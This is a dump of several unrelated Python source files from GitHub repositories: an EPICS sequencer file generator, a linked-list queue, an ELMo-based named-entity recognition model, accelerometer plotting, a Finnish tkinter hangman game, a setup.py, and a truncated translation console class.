field(DESC, \"Debug Waveform\") {nl}\\\n field(NELM, \"{lenlist}\") {nl}\\\n field(FTVL, \"{datatype.upper()}\") {nl}\\\n{close}{nl}'\nvdb.write(sncText)\nvdb.close()\n#########################################################\n########### Seqencer DBD Generation ###################\nsncText = \"registrar(\"+seqfilename+\"Registrar)\\n\"\ndbd.write(sncText)\ndbd.close()\n########### Seqencer File Generation ###################\nsncText = f'program {seqfilename} {nl}{nl}\\\noption +r; {nl}\\\n{datatype} wfList[{lenlist}];{nl}\\\nassign wfList to {open}{nl}' \nseq.write(sncText)\nfor orgidx, pvname in enumerate(pvlist):\n idx = orgidx + 1\n if(idx%5 == 0 and idx == lenlist):\n sncText = f'\"{pvname}\"{nl}'\n elif(idx%5 == 0 and idx != lenlist):\n sncText = f'\"{pvname}\",{nl}'\n elif(idx == lenlist):\n sncText = f'\"{pvname}\"{nl}'\n else:\n sncText = f'\"{pvname}\",'\n seq.write(sncText)\nprefix = prefix.replace('$(','{')\nprefix = prefix.replace(')','}')\nsncText = f'{close};{nl}{nl}\\\nmonitor wfList;{nl}\\\nevflag evWave;{nl}\\\nsync wfList to evWave;{nl}\\\n{datatype} wfValue[{lenlist}];{nl}\\\nassign wfValue to \"{prefix}{wfname}\";{nl}\\\nmonitor wfValue; {nl}\\\nss make{seqfilename} {nl}\\\n{open}{nl}\\\n state ini{nl}\\\n {open}{nl}\\\n when(TRUE){nl}\\\n {open}{nl}\\\n efSet(evWave);{nl}\\\n {close}state MakeWaveform{nl}\\\n {close}{nl}\\\n state MakeWaveform{nl}\\\n {open}{nl}\\\n when(efTestAndClear(evWave)){nl}\\\n {open}{nl}\\\n int index = 0;{nl}\\\n for(;index < {lenlist};index++){nl}\\\n wfValue[index]=wfList[index];{nl}{nl}\\\n pvPut (wfValue, SYNC);{nl}\\\n {close}state MakeWaveform{nl}\\\n {close}{nl}\\\n{close}'\nseq.write(sncText)\nseq.close()\n##############################################################\n\nsncText = f'{nl}\\\nrecord({dtype}, \"{signal}\"){nl}\\\n{open}{nl}'\ntempl.write(sncText)\n\nlistcnt = len(fieldlist)\nfor idx, field in enumerate(fieldlist):\n sncText = f'\\\n field({field}, {valuelist[idx]} ){nl}'\n templ.write(sncText)\n\nsncText =f'{close}{nl}'\ntempl.write(sncText)\ntempl.close()\n###################################################\n########### subtitution File Generation ###################\nsncText = f'file \"db/{templfilename+templExt}\" {open} pattern{nl}'\nsub.write(sncText)\nsignal = re.split('[$()]',signal)\nopen = '{'\ncomma =','\nsncText = '{'+signal[2]+','\nsncText = '{message: <{padcnt}}'.format(message = sncText, padcnt=40)\nsub.write(sncText)\n\nfor idx, field in enumerate(fieldlist):\n idx = idx+1\n if(idx == len(fieldlist)):\n sncText = field\n else:\n sncText = field+','\n sncText = '{message: <{padcnt}}'.format(message = sncText, padcnt=20)\n sub.write(sncText)\nsncText = '}\\n'\nsub.write(sncText)\n\nfor cnt in range(lenlist):\n sncText = '{'+pvlist[cnt]+','\n sncText = '{message: <{padcnt}}'.format(message = sncText, padcnt=40)\n sub.write(sncText)\n for idx, value in enumerate(valuelist):\n idx = idx+1\n if(value == \"\\\"\\\"\"): value = \"\"\n if(idx == len(valuelist)):\n sncText = \"\\\"\"+ value + \"\\\"\"\n else:\n sncText = \"\\\"\" + value+'\\\",'\n sncText = '{message: <{padcnt}}'.format(message = sncText, padcnt=20)\n sub.write(sncText)\n sncText = '}\\n'\n sub.write(sncText)\n\nsncText = '}\\n'\nsub.write(sncText)\nsub.close()\n\nprint('Successfully Generated File:', templfilename+templExt, seqfilename+seqExt)\n","repo_name":"Sangil-Lee/Work","sub_path":"siteApps/SCL3Cooldown-Final/cooldownApp/python/GenWaveformPV.py","file_name":"GenWaveformPV.py","file_ext":"py","file_size_in_byte":5343,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"36998573262","text":"class EmptyQueue(Exception):\n \"\"\" Custom exception class for Empty Stack \"\"\"\n pass\n\nclass LinkedQueue:\n \"\"\" FIFO (Fist In First Out) implementation using Python Linked list \"\"\"\n\n class _node:\n \"\"\" non-public class for Node of Linked List \"\"\"\n __slots__ = '_element', '_next'\n\n def __init__(self, e, next):\n self._element = e\n self._next = next\n \n def __init__(self):\n \"\"\" Create empty queue \"\"\"\n self._head = None\n self._tail = None\n self._size = 0\n\n def __len__(self):\n \"\"\" return number of elements in queue \"\"\"\n return self._size\n\n def is_empty(self):\n \"\"\" return True if queue is empty \"\"\"\n return self._size == 0\n\n def put(self, e):\n \"\"\" Add element to queue \"\"\"\n newnode = self._node(e, None)\n if self._size == 0:\n self._head = newnode\n else:\n self._tail._next = newnode\n self._tail = newnode\n self._size += 1\n\n def first(self):\n \"\"\" return but do not remove first element of queue \"\"\"\n if not self.is_empty():\n return self._head._element\n else:\n raise EmptyQueue('Queue is empty') #Raise an excepton if Queue is empty\n\n def get(self):\n \"\"\" remove first element from queue \"\"\"\n if not self.is_empty():\n e = self._head._element\n self._head = self._head._next\n self._size -= 1\n if self.is_empty():\n self._tail = None\n return e\n else:\n raise EmptyQueue('Queue is empty') #Raise an excepton if Queue is empty\n\nif __name__ == \"__main__\":\n try:\n q = LinkedQueue()\n\n print('Size of Queue {}'.format(len(q)))\n\n q.put(1)\n q.put('a')\n q.put(2.1)\n q.put('Test')\n print('Size of Queue {}'.format(len(q)))\n\n print('First element is {}'.format(q.first())) #check the first element\n\n print('Get element from queue {}'.format(q.get()))\n print('Size of Queue {}'.format(len(q)))\n print('Get element from queue {}'.format(q.get()))\n print('Size of Queue {}'.format(len(q)))\n print('Get element from queue {}'.format(q.get()))\n print('Size of Queue {}'.format(len(q)))\n print('Get element from queue {}'.format(q.get()))\n print('Size of Queue {}'.format(len(q)))\n #try get when queue is empty\n print('Get element from queue {}'.format(q.get()))\n print('Size of Queue {}'.format(len(q)))\n except Empty as e:\n print(e)\n\n\n\n","repo_name":"vizeit/DSnAlgorithms","sub_path":"src/datastructures/LinkedQueue.py","file_name":"LinkedQueue.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"36330987735","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nos.chdir('C:\\\\CMU\\\\Kaggle\\\\Entity Extraction')\nplt.style.use(\"ggplot\")\ndata = pd.read_csv(\"ner_dataset.csv\", encoding=\"latin1\")\ndata = data.drop(['POS'], axis =1)\ndata = data.fillna(method=\"ffill\")\ndata.tail(12)\nwords = set(list(data['Word'].values))\nwords.add('PADword')\nn_words = len(words)\nn_words\ntags = list(set(data[\"Tag\"].values))\nn_tags = len(tags)\nn_tags\n\n# this Class is in charge of converting every sentence with its named entities (tags) \n# into a list of tuples [(word, named entity), …]\nclass SentenceGetter(object):\n \n def __init__(self, data):\n self.n_sent = 1\n self.data = data\n self.empty = False\n agg_func = lambda s: [(w, t) for w, t in zip(s[\"Word\"].values.tolist(),s[\"Tag\"].values.tolist())]\n self.grouped = self.data.groupby(\"Sentence #\").apply(agg_func)\n self.sentences = [s for s in self.grouped]\n \n def get_next(self):\n try:\n s = self.grouped[\"Sentence: {}\".format(self.n_sent)]\n self.n_sent += 1\n return s\n except:\n return None\n \ngetter = SentenceGetter(data)\nsent = getter.get_next()\nprint(sent)\n[('Thousands', 'O'), ('of', 'O'), ('demonstrators', 'O'), ('have', 'O'), ('marched', 'O'), ('through', 'O'), ('London', 'B-geo'), ('to', 'O'), ('protest', 'O'), ('the', 'O'), ('war', 'O'), ('in', 'O'), ('Iraq', 'B-geo'), ('and', 'O'), ('demand', 'O'), ('the', 'O'), ('withdrawal', 'O'), ('of', 'O'), ('British', 'B-gpe'), ('troops', 'O'), ('from', 'O'), ('that', 'O'), ('country', 'O'), ('.', 'O')]\nsentences = getter.sentences\nprint(len(sentences))\n\nlargest_sen = max(len(sen) for sen in sentences)\nprint('biggest sentence has {} words'.format(largest_sen))\n\n\nplt.hist([len(sen) for sen in sentences], bins=50)\nplt.show()\n\n# the longest sentence has 140 words in it and we can see that almost all \n# of the sentences have less than 60 words in them\n\n# In order to feed our sentences into a LSTM network, \n# they all need to be the same size. looking at the distribution graph, \n# we can set the length of all sentences to 50 and add a generic word for the empty spaces; \n# this process is called padding.\n\nmax_len = 50\nX = [[w[0]for w in s] for s in sentences]\nnew_X = []\nfor seq in X:\n new_seq = []\n for i in range(max_len):\n try:\n new_seq.append(seq[i])\n except:\n new_seq.append(\"PADword\")\n new_X.append(new_seq)\nnew_X[15]\n\n# and the same applies for the named entities but we need to map our labels to numbers this time\nfrom keras.preprocessing.sequence import pad_sequences\ntags2index = {t:i for i,t in enumerate(tags)}\ny = [[tags2index[w[1]] for w in s] for s in sentences]\ny = pad_sequences(maxlen=max_len, sequences=y, padding=\"post\", value=tags2index[\"O\"])\ny[15]\n\n\n# Next we split our data into training and testing set and then we import tensorflow Hub \n# ( a library for the publication, discovery, and consumption of reusable parts of \n# machine learning models) to load the ELMo embedding feature and keras to start building our network.\n\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\nimport tensorflow_hub as hub\nfrom keras import backend as K\nX_tr, X_te, y_tr, y_te = train_test_split(new_X, y, test_size=0.1, random_state=2018)\nsess = tf.Session()\nK.set_session(sess)\nelmo_model = hub.Module(\"https://tfhub.dev/google/elmo/2\", trainable=True)\nsess.run(tf.global_variables_initializer())\nsess.run(tf.tables_initializer())\n\n\n# since we have 32 as the batch size, feeding the network must be \n# in chunks that are all multiples of 32\nbatch_size = 32\ndef ElmoEmbedding(x):\n return elmo_model(inputs={\"tokens\": tf.squeeze(tf.cast(x, tf.string)),\"sequence_len\": tf.constant(batch_size*[max_len])\n },\n signature=\"tokens\",\n as_dict=True)[\"elmo\"]\n \n \nfrom keras.models import Model, Input\nfrom keras.layers.merge import add\nfrom keras.layers import LSTM, Embedding, Dense, TimeDistributed, Dropout, Bidirectional, Lambda\n\ninput_text = Input(shape=(max_len,), dtype=tf.string)\nembedding = Lambda(ElmoEmbedding, output_shape=(max_len, 1024))(input_text)\nx = Bidirectional(LSTM(units=512, return_sequences=True,\n recurrent_dropout=0.2, dropout=0.2))(embedding)\nx_rnn = Bidirectional(LSTM(units=512, return_sequences=True,\n recurrent_dropout=0.2, dropout=0.2))(x)\nx = add([x, x_rnn]) # residual connection to the first biLSTM\nout = TimeDistributed(Dense(n_tags, activation=\"softmax\"))(x)\nmodel = Model(input_text, out)\nmodel.compile(optimizer=\"adam\", loss=\"sparse_categorical_crossentropy\", metrics=[\"accuracy\"])\n\n\nX_tr, X_val = X_tr[:1213*batch_size], X_tr[-135*batch_size:]\ny_tr, y_val = y_tr[:1213*batch_size], y_tr[-135*batch_size:]\ny_tr = y_tr.reshape(y_tr.shape[0], y_tr.shape[1], 1)\ny_val = y_val.reshape(y_val.shape[0], y_val.shape[1], 1)\nhistory = model.fit(np.array(X_tr), y_tr, validation_data=(np.array(X_val), y_val),batch_size=batch_size, epochs=3, verbose=1)\n\nfrom seqeval.metrics import precision_score, recall_score, f1_score, classification_report\nX_te = X_te[:149*batch_size]\ntest_pred = model.predict(np.array(X_te), verbose=1)\n\nidx2tag = {i: w for w, i in tags2index.items()}\n\ndef pred2label(pred):\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n p_i = np.argmax(p)\n out_i.append(idx2tag[p_i].replace(\"PADword\", \"O\"))\n out.append(out_i)\n return out\ndef test2label(pred):\n out = []\n for pred_i in pred:\n out_i = []\n for p in pred_i:\n out_i.append(idx2tag[p].replace(\"PADword\", \"O\"))\n out.append(out_i)\n return out\n \npred_labels = pred2label(test_pred)\ntest_labels = test2label(y_te[:149*32])\nprint(classification_report(test_labels, pred_labels))\n\ni = 390\np = model.predict(np.array(X_te[i:i+batch_size]))[0]\np = np.argmax(p, axis=-1)\nprint(\"{:15} {:5}: ({})\".format(\"Word\", \"Pred\", \"True\"))\nprint(\"=\"*30)\nfor w, true, pred in zip(X_te[i], y_te[i], p):\n if w != \"__PAD__\":\n print(\"{:15}:{:5} ({})\".format(w, tags[pred], tags[true]))\n \n\n","repo_name":"SyedDanishAhmed/Named-Entity-Recognition","sub_path":"entity-extraction-lstm.py","file_name":"entity-extraction-lstm.py","file_ext":"py","file_size_in_byte":6212,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"75177223496","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndata = np.loadtxt('accelerometer.txt')\nprint(np.shape(data))\n\ntime = np.linspace(0,len(data)*0.1,len(data))\n\ndata20 = data[time<20]\ntime20 = time[time<20]\n\ndata_end = data[time > 52]\ntime_end = time[time > 52]\n\ndata_end2 = data_end[time_end < 63]\ntime_end2 = time_end[time_end < 63]\n\nplt.plot(time,data,label='Full Data Set')\nplt.plot(time20,data20,label='Time < 20 data set')\nplt.plot(time_end2,data_end2,label='Time end data set')\nplt.legend()\nplt.grid()\n\nplt.figure()\nplt.plot(time20,data20,'m-')\nplt.plot(time_end2-time_end2[0],data_end2,'g-')\nplt.grid()\n\nmean20 = np.mean(data20)\nstd20 = np.std(data20)\nprint(mean20,std20)\nmean_end = np.mean(data_end2)\nstd_end = np.std(data_end2)\nprint(mean_end,std_end)\n\nplt.figure()\nplt.hist(data20)\n\nplt.figure()\nplt.hist(data_end2)\n\nplt.show()","repo_name":"cmontalvo251/Python","sub_path":"instrumentation/cpx_assignments/plot_raw_accelerometer.py","file_name":"plot_raw_accelerometer.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"45"} +{"seq_id":"6298910595","text":"#TIE-02100\r\n#13.2 Graafisen käyttöliittymän suunnitteleminen ja toteuttaminen\r\n#Henri Pulkkinen\r\n#oppnro \r\n#huhtikuu 2017\r\n\r\n#Hirsipuupeli. Käyttäjä syöttää kirjaimia entry-kenttään\r\n#tai arvaa koko sanan/lauseen. Vääriä arvauksia sallitaan 9.\r\n#Väärästä arvauksesta ilmoitetaaan käyttäjälle tekstin lisäksi\r\n#käyttöliittymän alalaidan asteikolla, missä punaisten ruutujen\r\n#määrä indikoi väärin menneiden yritysten lukumäärää. Alussa\r\n#kaikki ruudut ovat valkoisia. Kymmenen väärän arvauksen\r\n#jälkeen peli on hävitty.\r\n#Uuden pelin voi aloittaa milloin vain New game-nappulalla,\r\n#jolloin myös arvotaaan uusi sana listasta.\r\n#Uusia sanoja/lauseita on helppo lisätä peliin; riittää kun ne\r\n#lisätään SANAT-listaan.\r\n#Jos käyttäjä arvaa kaikki oikeat kirjaimet tai arvaa oikein koko\r\n#sanan/lauseen, käyttäjä voittaa pelin ja siitä ilmoitetaan\r\n#tekstillä. Lisäksi kaikki alalaidan ruudut muuttuvat vihreiksi.\r\n#Mikäli käyttäjä syöttää yhden merkin, joka on jotain muuta kuin\r\n#kirjain, ruutuun tulee teksti \"Invalid input\", eikä käyttäjä\r\n#saa rangaistusta (alalaidan ruutujen tilanne ei muutu. Yli yhden\r\n#merkin yritykset tulkitaan ratkaisuyrityksiksi, ja väärästä\r\n#vastauksesta rangaistaan kuten väärän kirjaimen syöttämisestäkin.\r\n#\r\n#Työssä tähdättiin yksinkertaiseen toteutukseen, mutta mukaan tuli\r\n#lopulta monia skaalautuvan version piirteitä.\r\n\r\n\r\n\r\nfrom tkinter import *\r\nimport random\r\n\r\n#MERKIT-listasta saadaan kirjainten, sekä välilyönnin ja tyhjän ruudun\r\n#tiedostonimet.\r\nMERKIT = { \"A.gif\", \"B.gif\",\"c.gif\", \"d.gif\" ,\"e.gif\", \"F.gif\"\r\n ,\"G.gif\", \"h.gif\" ,\"I.gif\", \"j.gif\" ,\"k.gif\", \"l.gif\"\r\n ,\"m.gif\", \"n.gif\" ,\"o.gif\", \"p.gif\" ,\"q.gif\", \"r.gif\"\r\n ,\"s.gif\", \"t.gif\" ,\"u.gif\", \"w.gif\" ,\"v.gif\", \"x.gif\"\r\n ,\"y.gif\", \"z.gif\", \"aa.gif\", \"ae.gif\", \"oe.gif\", \"valI.gif\"\r\n ,\"tyhja.gif\"}\r\n\r\n#VÄRIT-listasta saadaan alalaidan väriruutujen tiedostot.\r\nVÄRIT= {\"valkee.gif\",\"punane.gif\",\"vihree.gif\"}\r\n\r\n\r\n#SANAT-lista sisältää pelissä arvattavat sanat. Pitkiä\r\n#lauseita voi rivittää /-merkillä. Käytössä ovat merkit A-Ö.\r\nSANAT=[\"JOHDATUS/OHJELMOINTIIN\",\"KALEVAN/PALLO\",\r\n \"KAHVIGALLUP\",\"GRAAFISEN/KÄYTTÖLIITTYMÄN/SUUNNITTELEMINEN\"\r\n \"/JA TOTEUTTAMINEN\",\"PEKKA SARAVO\",\"PUFF THE MAGIC DRAGON\"\r\n ,\"YESTERDAY ALL/MY TROUBLES SEEMED/SO FAR AWAY\",\r\n \"VIHREÄN JOEN/RANNALLA\", \"YÖ KUIN SIELU/TEEKKARIN ON PIMIÄ\"\r\n ,\"HELMIPÖLLÖ ON/SUOMEN YLEISIN/PÖLLÖLAJI\"]\r\n\r\nclass peli:\r\n def __init__(self):\r\n self.__window = Tk()\r\n self.__window.title(\"Hangman\")\r\n\r\n self.__merkit = {}\r\n # Lisätään kuvatiedostot dictiin.\r\n for picfile in MERKIT:\r\n pic = PhotoImage(file=picfile)\r\n avain=picfile.strip(\".gif\").upper()\r\n self.__merkit[avain]=pic\r\n self.__merkit[\"Ö\"]=PhotoImage(file=\"oe.gif\")\r\n self.__merkit[\"Ä\"]=PhotoImage(file=\"ae.gif\")\r\n self.__merkit[\"Å\"]=PhotoImage(file=\"aa.gif\")\r\n\r\n\r\n self.__asteikkopics={}\r\n #Lisätään väriruudut omaan dictiinsä.\r\n for picfile in VÄRIT:\r\n pic = PhotoImage(file=picfile)\r\n avain=picfile.strip(\".gif\")\r\n self.__asteikkopics[avain]=pic\r\n\r\n self.initialize_game()\r\n\r\n def initialize_game(self):\r\n sanan_numero=random.randint(0,(len(SANAT)-1))\r\n self.__sana=SANAT[sanan_numero]\r\n self.__merkkilabels = []\r\n self.__asteikko=[]\r\n\r\n # Luodaan labelit arvotun sanan kirjaimille/merkeille.\r\n # /-merkin kohdalla vaihdetaan uudelle riville.\r\n sarake=1\r\n rivi=0\r\n for i in range(len(self.__sana)):\r\n if self.__sana[i]==\"/\":\r\n rivi+=1\r\n sarake=0\r\n new_label = Label(self.__window)\r\n new_label.grid(row=0+rivi, column=3+sarake,sticky=E)\r\n self.__merkkilabels.append(new_label)\r\n sarake+=1\r\n\r\n\r\n i=0\r\n #Luodaan labelit alalaidan asteikolle.\r\n for x in range (10):\r\n new_label = Label(self.__window,\r\n image=self.__asteikkopics[\"valkee\"])\r\n new_label.grid(row=5, column=4+i)\r\n self.__asteikko.append(new_label)\r\n i+=1\r\n\r\n\r\n indeksi = 0\r\n self.__asetetut_merkit=0\r\n #Lisätään labeleihin kuvatiedostot. Välilyönnit ovat\r\n #harmaita ruutuja ja vielä arvaamattomien kirjainten\r\n #paikalla on tyhjät valkoiset ruudut.\r\n #self.__asetetut_merkit-lukua tarvitaan, kun tarkastetaaan\r\n #onko kaikki kirjaimet arvattu oikein.\r\n for label in self.__merkkilabels:\r\n if self.__sana[indeksi] is not \"/\":\r\n if self.__sana[indeksi]==\" \":\r\n label.configure(image=self.__merkit[\"VALI\"])\r\n self.__asetetut_merkit+=1\r\n else:\r\n label.configure(image=self.__merkit[\"TYHJA\"])\r\n else: self.__asetetut_merkit+=1\r\n indeksi+=1\r\n\r\n self.__arvatut=[]\r\n self.__väärien_määrä=0\r\n\r\n\r\n self.__kirjain = Entry(self.__window)\r\n self.__kirjain.grid(row=3,column=1)\r\n self.__explanationtext = Label(self.__window,\r\n text=\"Start by entering a letter\")\r\n self.__explanationtext.grid(row=2,column=1)\r\n Button(self.__window, text=\"new game\", command=self.new_game)\\\r\n .grid(row=6, column=1, sticky=E)\r\n Button(self.__window, text=\"stop\", command=self.__window.destroy)\\\r\n .grid(row=6, column=2)\r\n\r\n self.__quessButton = Button(self.__window,\r\n text=\"Quess\",command=self.enter)\r\n self.__quessButton.grid(row=4, column=1, sticky=W+E)\r\n\r\n\r\n\r\n\r\n def enter(self):\r\n '''\r\n Tarkastaa syötteen laadun, eli onko syöte kirjain, koko lause vai\r\n \"kielletty\"-merkki. Mikäli kyseessä on virheellinen merkki\r\n tulostetaan virheilmoitus. Mikäli kyseessä yli yhden merkin mittainen\r\n merkkijono, tulkitaan käyttäjän yrittävän ratkaista koko sanaa/lausetta,\r\n jolloin kutsutaan koko_lause funktiota. Mikäli kyseessä on hyväksyttävissä\r\n oleva merkki, tarkastetaan ettei sitä ole jo arvattu. Tämän jälkeen\r\n kutsutaan joko väärin- tai oikea_kirjain-funktiota sen mukaan\r\n löytyykö kirjain kysytystä arvoituksesta.\r\n :return: \r\n '''\r\n kirjain = self.__kirjain.get().upper()\r\n if kirjain !=\"\":\r\n if len(kirjain)==1:\r\n if kirjain.isalpha()==False:\r\n self.__explanationtext.configure(text=\"Invalid input\")\r\n else:\r\n if kirjain not in self.__arvatut:\r\n if kirjain not in self.__sana:\r\n self.väärin(kirjain)\r\n else:\r\n self.oikea_kirjain(kirjain)\r\n self.__arvatut.append(kirjain)\r\n else:\r\n self.__explanationtext.configure\\\r\n (text=\"You have already entered this letter\")\r\n else:\r\n self.koko_lause(kirjain)\r\n self.__kirjain.delete(0,END)\r\n self.tarkasta_lopetus()\r\n\r\n\r\n\r\n def oikea_kirjain(self,kirjain):\r\n '''\r\n Kun käyttäjä syöttää oikean kirjaimen, tämä metodi asettaa\r\n sen/ne näkyviin ruudulle.\r\n :param kirjain: arvattu kirjain\r\n :return:\r\n '''\r\n index=0\r\n avain=kirjain\r\n for kirjaimet in self.__sana:\r\n if kirjaimet==kirjain:\r\n self.__merkkilabels[index].configure(image=self.__merkit[avain])\r\n self.__asetetut_merkit += 1\r\n index+=1\r\n self.__explanationtext.configure(text=\"Correct!\")\r\n\r\n\r\n def väärin(self,kirjain):\r\n '''\r\n Kun käyttäjä arvaa väärin, tämä metodi suorittaa\r\n vaadittavat toimenpiteet. Ikkunan alareunan ruudut\r\n muuttuvat punaisiksi, seliteteksti(explanationtext)\r\n\t päivittyy ja käyttäjän mahdollinen häviö tarkistetaan.\r\n :param kirjain:\r\n :return:\r\n '''\r\n self.__arvatut.append(kirjain)\r\n self.__asteikko[self.__väärien_määrä].configure\\\r\n (image=self.__asteikkopics[\"punane\"])\r\n self.__väärien_määrä += 1\r\n self.__explanationtext.configure(text=\"Wrong!\")\r\n if self.__väärien_määrä>len(self.__sana):\r\n self.__explanationtext.configure(text=\"You lose!\")\r\n\r\n def koko_lause(self,mjono):\r\n '''\r\n Jos käyttäjä syöttää yli yhden merkin mittaisen arvauksen,\r\n tämä metodi tarkastaa, vastaako arvaus kysyttyä sanaa tai lausetta.\r\n :param mjono: käyttäjän syöttämä merkkijono\r\n :return: \r\n '''\r\n vertailusana=\"\"\r\n for kirjain in self.__sana:\r\n if kirjain is not \"/\":\r\n if kirjain is not \" \":\r\n vertailusana+=kirjain\r\n syötetty_sana=\"\"\r\n for kirjain in mjono:\r\n if kirjain is not \" \":\r\n syötetty_sana+=kirjain\r\n if syötetty_sana.upper()==vertailusana.upper():\r\n self.oikein()\r\n else:\r\n self.väärin(mjono)\r\n\r\n def ruudukon_täyttö(self):\r\n '''\r\n Käyttäjän arvatessa koko sanan oikein\r\n tämä metodi asettaa koko ko. sanan näkyviin ruudulle.\r\n :return: \r\n '''\r\n indeksi=0\r\n for label in self.__merkkilabels:\r\n kuva=str(self.__sana[indeksi])\r\n if self.__sana[indeksi] is not \"/\":\r\n if self.__sana[indeksi]==(\" \"):\r\n kuva=\"VALI\"\r\n label.configure(image=self.__merkit[kuva])\r\n indeksi+=1\r\n\r\n\r\n def oikein(self):\r\n '''\r\n Käyttäjän arvatessa koko sanan oikein, tämä\r\n metodi suorittaa tarvittavat toimenpiteet sen\r\n ilmoittamiseen. Kysytyt kirjaimet ja onnitteluteksti\r\n ilmestyvät ruudulle. Alalaidan merkit muuttuvat vihreiksi.\r\n :return: \r\n '''\r\n self.ruudukon_täyttö()\r\n self.__explanationtext.configure(text=\"Congratulations! \"\r\n \"You won!\")\r\n self.__quessButton.configure(state=\"disabled\")\r\n for label in self.__asteikko:\r\n label.configure(image=self.__asteikkopics[\"vihree\"])\r\n\r\n\r\n\r\n def tarkasta_lopetus(self):\r\n '''\r\n Tarkastaa, onko käyttäjä ratkaissut tehtävän\r\n arvaamalla kaikki kirjaimet oikein, tai onko\r\n sallittu väärien arvausten määrä ylitetty.\r\n :return: \r\n '''\r\n if self.__asetetut_merkit==len(self.__sana):\r\n self.oikein()\r\n if self.__väärien_määrä==10:\r\n self.__explanationtext.configure(text=\"You lost!\")\r\n self.ruudukon_täyttö()\r\n self.__quessButton.configure(state=\"disabled\")\r\n\r\n def new_game(self):\r\n '''\r\n Nollaa pelin ja aloittaa uuden.\r\n :return: \r\n '''\r\n for labels in self.__merkkilabels:\r\n labels.destroy()\r\n self.__explanationtext.configure(text=\"\")\r\n self.initialize_game()\r\n\r\n\r\n def start(self):\r\n self.__window.mainloop()\r\n\r\n\r\ndef main():\r\n peli().start()\r\nmain()\r\n","repo_name":"pulkkinho/hangman","sub_path":"hirsipuu.py","file_name":"hirsipuu.py","file_ext":"py","file_size_in_byte":11513,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"72650804935","text":"import re\nimport ast\nfrom setuptools import setup\n\n\n_version_re = re.compile(r'__version__\\s+=\\s+(.*)')\n\n\nwith open('pytrans/__init__.py', 'rb') as f:\n version = str(ast.literal_eval(_version_re.search(\n f.read().decode('utf-8')).group(1)))\n\n\nsetup(\n name='pytrans',\n author='luw2007',\n author_email='luw20007@gmail.com',\n version=version,\n url='http://github.com/luw2007/python-translate-cli',\n license='The MIT License',\n packages=['pytrans'],\n description='use Google Translate to query word, like soimort/translate-shell.'\n 'But verbose about Definitions, Synonyms, Example.',\n classifiers=[\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: MacOS',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: Microsoft :: Windows',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n ],\n install_requires=[\n 'click',\n ],\n entry_points='''\n [console_scripts]\n pytrans=pytrans:cli\n ''',\n\n)\n","repo_name":"luw2007/python-translate-cli","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"45"} +{"seq_id":"31936894323","text":"from FileManagement.FileManager import *\nfrom TranslationModel.TranslationModel import *\nfrom TranslationConsoleConfiguration import *\nimport re\nimport os\nfrom functools import reduce\n\n\nclass TranslateConsole:\n programFilePath = 'program.json'\n\n def __init__(self):\n self.__setProgramFile()\n self.fileManager = FileManager()\n today_logs = self.fileManager.read_log_with_date(self.logFilePath)\n self.count = reduce(lambda x, y: x + int(y[2]), today_logs, 0)\n self.translationModel = TranslationModel(self.envFilePath)\n self.translatedText = ''\n\n def __setProgramFile(self):\n with open(self.programFilePath, 'r') as f:\n programFile = json.load(f)\n if programFile['env'] is None or programFile['log'] is None:\n raise Exception(\"The program file is wrong.\")\n if not os.path.isfile(programFile['env']):\n raise Exception(\"env file path is wrong.\")\n if not os.path.isfile(programFile['env']):\n raise Exception(\"Log file path is wrong.\")\n self.max_count = 10000 if programFile['max'] is None else int(programFile['max'])\n self.envFilePath = programFile['env']\n self.logFilePath = programFile['log']\n\n def __file_tree(self, option=False):\n return TranslationConsoleConfiguration.show_tree(self.fileManager.root.show_tree(option=option), option=option)\n\n def __status(self):\n return TranslationConsoleConfiguration.show_status(self.fileManager.select,\n self.translationModel.source,\n self.translationModel.target,\n self.count,\n self.max_count)\n\n def select(self, path):\n self.fileManager.selectFilePath(path)\n\n def translate(self, show=True):\n text = self.fileManager.load()\n translateText = ''\n size = len(text)\n translated_text_count = 0\n if show:\n print()\n self.printProgressBar(0, size, length=50)\n for (idx, (state, line)) in enumerate(text):\n if state:\n translateText += self.translationModel.translate(line)\n # translateText += line # testing\n translated_text_count += len(line)\n else:\n translateText += line\n if show:\n self.printProgressBar(idx + 1, size, length=50)\n self.fileManager.logging(self.logFilePath, translated_text_count)\n self.translateText = translateText\n\n def save(self, path):\n self.fileManager.save(path, self.translateText)\n\n def __c_select(self, path, hp=False):\n if hp:\n print(TranslationConsoleConfiguration.select_help)\n return\n if path is None:\n print(TranslationConsoleConfiguration.Error.the_number_of_argument_does_not_match.message())\n else:\n if os.path.isfile(path):\n self.select(path)\n else:\n print(TranslationConsoleConfiguration.Error.file_does_not_exist.message())\n\n def __c_translate(self, hp=False):\n if hp:\n print(TranslationConsoleConfiguration.translate_help)\n return\n if self.fileManager.select is None:\n print(TranslationConsoleConfiguration.Error.must_select_a_file.message())\n else:\n self.translate()\n\n def __c_save(self, path, hp=False):\n if hp:\n print(TranslationConsoleConfiguration.save_help)\n return\n if self.fileManager.select is None:\n print(TranslationConsoleConfiguration.Error.must_select_a_file.message())\n else:\n self.save(path)\n\n def __c_show(self, option, hp=False):\n if hp:\n print(TranslationConsoleConfiguration.show_help)\n return\n al = option in ['-al']\n print(self.__file_tree(al))\n\n def __c_help(self):\n print(TranslationConsoleConfiguration.help)\n\n def __c_set_target(self, lang_code, hp=False):\n if hp:\n print(TranslationConsoleConfiguration.setTarget_help)\n return\n if lang_code is None:\n print(TranslationConsoleConfiguration.Error.the_number_of_argument_does_not_match.message())\n elif lang_code not 